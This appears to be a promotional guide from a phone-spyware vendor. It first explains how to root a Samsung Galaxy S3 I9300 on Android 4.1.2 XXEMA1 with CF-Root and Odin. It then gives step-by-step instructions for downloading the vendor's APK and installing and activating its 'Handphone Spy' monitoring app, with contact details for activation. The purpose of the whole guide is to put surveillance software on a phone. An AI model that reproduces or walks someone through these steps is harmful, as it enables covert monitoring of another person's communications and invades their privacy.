I receive a lot of emails asking me how to root Samsung Galaxy S3 on Android 4.1.2 XXEMA1, so that they can install Handphone Spy for Android.
Disclaimer: Hand Phone Spy App wishes to remind its readers that it will not be held responsible for any damage to the device. Users are reminded to verify the model number of their devices since this root package only works with Samsung Galaxy S3 I9300. You should also check to see what baseband the phone is running and use the appropriate [How To] Guide found here at Hand Phone Spy App.
Things You Should Be Do Before You Begin
- Install USB Drivers for Samsung Galaxy S3 on the computer.
- Enable USB Debugging Mode. Press Menu>>Settings>>Applications.
- Ensure USB Debugging Mode is turned on.
- Be aware that rooting the Samsung Galaxy S3 will void the manufacturer’s warranty.
- The phone should be factory unlocked.
- Ensure that the battery level is above 40%.
- We strongly advice you to back up your phone before proceeding! This is super critical and something that a lot of rooting guides miss out.
- Hand phones are machines and there maybe a chance that you may “BRICK” your phone, which in essence means you have nothing more than a paper weight if things go wrong. So bear that in mind before you begin the rooting process.
Steps to root Galaxy S3 I9300 on Android 4.1.2 XXEMA1 Jelly Bean
- Go to Settings>>About Device. Check baseband to ensure that the Baseband is XXEMA1 before proceeding with the following steps.
- Download CF-Root-SGS3-v6.4.zip for Samsung Galaxy S3 to a computer and extract the zip file.
- Download Odin v1.85.
- Power off the phone and boot into Download Mode. To get into Download Mode, what you will need to do is press and hold the Volume Down on the left hand side of the phone, press and hold the home button at the bottom of the phone and also press and hold the power buttons simultaneously. Once you hold it correctly for about 5 seconds, you will see a construction Android Robot and a triangle. Let go of the Volume Down button, the home button and the power button. The phone will now request if you wish to continue. Hit the Volume Up button to continue.
- Launch Odin on the computer.
- Connect the phone to the computer using the USB cable provided while the phone is in the Download Mode. If you have installed the USB Drivers for Samsung Galaxy S3 correctly, you will see one of the ID: COM box will turn yellow with a COM port number. Please note that this progress might take a bit of time.
- In Odin, click on PDA and select the CF-Root-SGS3-v6.4.tar.
- Ensure that Auto Reboot and F.Reset Time options are selected in Odin.
- Now click the start button in Odin to begin the installation. This process should take a few minutes.
- Once the installation process is completed, the phone will automatically reboot while running a script on the phone.
- Once the Home screen appears, you can now unplug the USB cable from the phone.
If everything ran accordingly, you should have successfully rooted the phone. To ensure that the above mentioned root method is working correctly, you can go to google play and download the Root Checker app and verify that the phone now has Root Access. If it has, congradulations, you have just successfully rooted the Samsung Galaxy S3 running Android 4.1.2 XXEMA1.
[SOURCE: Team Android]
Install Handphone Spy for Android
- Open your web browser and go to www.handphonespy.com/front/android/Device.apk.
- Download Handphone Spy for Android. You would have been given the download link where to download Handphone Spy for Android.
- Once the download is ready, click on Install. The installation process takes only a few minutes.
- Once the installation is completed, you will be asked to either to OPEN the app or to be DONE with the installation process. Press OPEN. Do not press DONE, otherwise, you would need to reinstall the app again.
- You will now then be presented with an activation screen. You will need to put in your email, your user name and your password that was sent to you.
- Once you have entered in all the details, you can now press the submit button.
- Now send an sms to +(65) 9228-5970 or alternatively you can send an email to firstname.lastname@example.org with your username to activate your account.
- If you have installed and wish to purchase the app, you can send an email to email@example.com to make enquiries on how to activate your account.